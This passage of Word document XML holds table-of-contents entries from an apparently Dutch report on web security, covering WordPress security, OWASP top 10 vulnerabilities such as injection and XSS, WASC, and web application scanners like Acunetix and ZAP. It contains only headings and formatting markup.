            </w:r>
            <w:r w:rsidR="0035542D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="0035542D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="0035542D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>17</w:t>
            </w:r>
            <w:r w:rsidR="0035542D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="73ED3233" w14:textId="77777777" w:rsidR="0035542D" w:rsidRDefault="00D85C27">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9062"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
              <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc496292425" w:history="1">
            <w:r w:rsidR="0035542D" w:rsidRPr="00BE4637">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.2.1 Wordpress op gebied van security</w:t>
            </w:r>
            <w:r w:rsidR="0035542D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0035542D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="0035542D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc496292425 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="0035542D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="0035542D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="0035542D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>17</w:t>
            </w:r>
            <w:r w:rsidR="0035542D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="6DABB268" w14:textId="77777777" w:rsidR="0035542D" w:rsidRDefault="00D85C27">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9062"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
              <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc496292426" w:history="1">
            <w:r w:rsidR="0035542D" w:rsidRPr="00BE4637">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3 Onderzoek</w:t>
            </w:r>
            <w:r w:rsidR="0035542D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0035542D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="0035542D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc496292426 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="0035542D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="0035542D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="0035542D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>23</w:t>
            </w:r>
            <w:r w:rsidR="0035542D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="6EE81E90" w14:textId="77777777" w:rsidR="0035542D" w:rsidRDefault="00D85C27">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9062"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
              <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc496292427" w:history="1">
            <w:r w:rsidR="0035542D" w:rsidRPr="00BE4637">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.1 Inleiding</w:t>
            </w:r>
            <w:r w:rsidR="0035542D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0035542D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="0035542D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc496292427 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="0035542D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="0035542D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="0035542D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>23</w:t>
            </w:r>
            <w:r w:rsidR="0035542D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="59E971F9" w14:textId="77777777" w:rsidR="0035542D" w:rsidRDefault="00D85C27">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9062"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
              <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc496292428" w:history="1">
            <w:r w:rsidR="0035542D" w:rsidRPr="00BE4637">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.2 Web security en de kwetsbaarheden</w:t>
            </w:r>
            <w:r w:rsidR="0035542D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0035542D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="0035542D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc496292428 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="0035542D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="0035542D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="0035542D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>24</w:t>
            </w:r>
            <w:r w:rsidR="0035542D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="6BC63A71" w14:textId="77777777" w:rsidR="0035542D" w:rsidRDefault="00D85C27">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9062"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
              <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc496292429" w:history="1">
            <w:r w:rsidR="0035542D" w:rsidRPr="00BE4637">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.2.1 OWASP top 10 lijst</w:t>
            </w:r>
            <w:r w:rsidR="0035542D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0035542D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="0035542D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc496292429 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="0035542D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="0035542D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="0035542D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>25</w:t>
            </w:r>
            <w:r w:rsidR="0035542D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="2EBCEADA" w14:textId="77777777" w:rsidR="0035542D" w:rsidRDefault="00D85C27">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9062"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
              <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc496292430" w:history="1">
            <w:r w:rsidR="0035542D" w:rsidRPr="00BE4637">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.2.2 OWASP Kwetsbaarheden</w:t>
            </w:r>
            <w:r w:rsidR="0035542D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0035542D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="0035542D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc496292430 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="0035542D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="0035542D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="0035542D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>26</w:t>
            </w:r>
            <w:r w:rsidR="0035542D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="208A72F5" w14:textId="77777777" w:rsidR="0035542D" w:rsidRDefault="00D85C27">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9062"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
              <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc496292431" w:history="1">
            <w:r w:rsidR="0035542D" w:rsidRPr="00BE4637">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>A1 injectie</w:t>
            </w:r>
            <w:r w:rsidR="0035542D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0035542D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="0035542D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc496292431 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="0035542D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="0035542D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="0035542D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>26</w:t>
            </w:r>
            <w:r w:rsidR="0035542D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="7A68D899" w14:textId="77777777" w:rsidR="0035542D" w:rsidRDefault="00D85C27">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9062"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
              <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc496292432" w:history="1">
            <w:r w:rsidR="0035542D" w:rsidRPr="00BE4637">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>A3 XSS</w:t>
            </w:r>
            <w:r w:rsidR="0035542D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0035542D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="0035542D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc496292432 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="0035542D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="0035542D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="0035542D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>27</w:t>
            </w:r>
            <w:r w:rsidR="0035542D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="234A5D3F" w14:textId="77777777" w:rsidR="0035542D" w:rsidRDefault="00D85C27">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9062"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
              <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc496292433" w:history="1">
            <w:r w:rsidR="0035542D" w:rsidRPr="00BE4637">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.2.3 WASC</w:t>
            </w:r>
            <w:r w:rsidR="0035542D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0035542D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="0035542D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc496292433 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="0035542D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="0035542D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="0035542D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>29</w:t>
            </w:r>
            <w:r w:rsidR="0035542D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="76E7F082" w14:textId="77777777" w:rsidR="0035542D" w:rsidRDefault="00D85C27">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9062"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
              <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc496292434" w:history="1">
            <w:r w:rsidR="0035542D" w:rsidRPr="00BE4637">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.4 Webapplicatie scanner</w:t>
            </w:r>
            <w:r w:rsidR="0035542D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0035542D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="0035542D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc496292434 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="0035542D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="0035542D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="0035542D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>32</w:t>
            </w:r>
            <w:r w:rsidR="0035542D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="3B029507" w14:textId="77777777" w:rsidR="0035542D" w:rsidRDefault="00D85C27">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9062"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
              <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc496292435" w:history="1">
            <w:r w:rsidR="0035542D" w:rsidRPr="00BE4637">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.4.1 Inleiding</w:t>
            </w:r>
            <w:r w:rsidR="0035542D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0035542D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="0035542D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc496292435 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="0035542D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="0035542D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="0035542D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>32</w:t>
            </w:r>
            <w:r w:rsidR="0035542D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="6D1BF34C" w14:textId="77777777" w:rsidR="0035542D" w:rsidRDefault="00D85C27">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9062"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
              <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc496292436" w:history="1">
            <w:r w:rsidR="0035542D" w:rsidRPr="00BE4637">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.4.4 Acunetix</w:t>
            </w:r>
            <w:r w:rsidR="0035542D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0035542D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="0035542D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc496292436 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="0035542D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="0035542D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="0035542D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>34</w:t>
            </w:r>
            <w:r w:rsidR="0035542D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="6451AEEE" w14:textId="77777777" w:rsidR="0035542D" w:rsidRDefault="00D85C27">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9062"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
              <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc496292437" w:history="1">
            <w:r w:rsidR="0035542D" w:rsidRPr="00BE4637">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
                <w:lang w:val="en-GB"/>
              </w:rPr>
              <w:t>3.4.5 Zap Zed Attack Proxy</w:t>
            </w:r>
            <w:r w:rsidR="0035542D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0035542D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="0035542D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc496292437 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="0035542D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="0035542D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="0035542D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>35</w:t>
            </w:r>
            <w:r w:rsidR="0035542D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="2CB0D846" w14:textId="77777777" w:rsidR="0035542D" w:rsidRDefault="00D85C27">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9062"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
              <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc496292438" w:history="1">
            <w:r w:rsidR="0035542D" w:rsidRPr="00BE4637">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.4.7 Conclusie</w:t>
            </w:r>
            <w:r w:rsidR="0035542D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0035542D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="0035542D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc496292438 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="0035542D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="0035542D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="0035542D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>37</w:t>
            </w:r>
            <w:r w:rsidR="0035542D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="1765B9EB" w14:textId="77777777" w:rsidR="0035542D" w:rsidRDefault="00D85C27">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9062"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
              <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc496292439" w:history="1">
            <w:r w:rsidR="0035542D" w:rsidRPr="00BE4637">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.5 Technologie</w:t>
            </w:r>
            <w:r w:rsidR="0035542D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0035542D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="0035542D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc496292439 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="0035542D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="0035542D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="0035542D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>39</w:t>
            </w:r>
            <w:r w:rsidR="0035542D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
